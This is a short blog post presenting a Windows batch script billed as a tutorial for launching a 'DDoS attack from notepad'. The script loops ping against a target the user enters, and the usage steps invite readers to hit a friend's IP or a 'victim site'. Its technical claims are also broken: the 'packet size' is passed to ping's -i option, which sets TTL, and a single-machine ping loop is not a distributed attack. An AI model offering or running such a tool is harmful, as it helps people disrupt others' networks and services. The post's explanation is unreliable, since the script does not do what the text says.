ComRȁde PyRate

Sunday 4 January 2015

DDos attack from notepad



Here is a simple tutorial about how to launch DDos attack from notepad Big Grin

Step 1:

Open Notepad

Copy this script into notepad

@echo off
mode 67,16
title DDOS Attack By Wild Wings Hackers!
color 0a
cls
echo.
echo PrinceDDOS
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

save as DDOS.bat

How to Use
----------

1. Open ddos.bat
2. On-Target Server input menu type the
web address / Ip your friend that you want to DDOS

3.Get in victim site
________

And then input the results of the ping IP in the host and
Packet Size for it to send the number of bytes to be
Size (size up to you)

then press "ENTER"




Enjoy Guys! and don't forget to post your comments. © Comrade Pyrate

No comments:

Post a Comment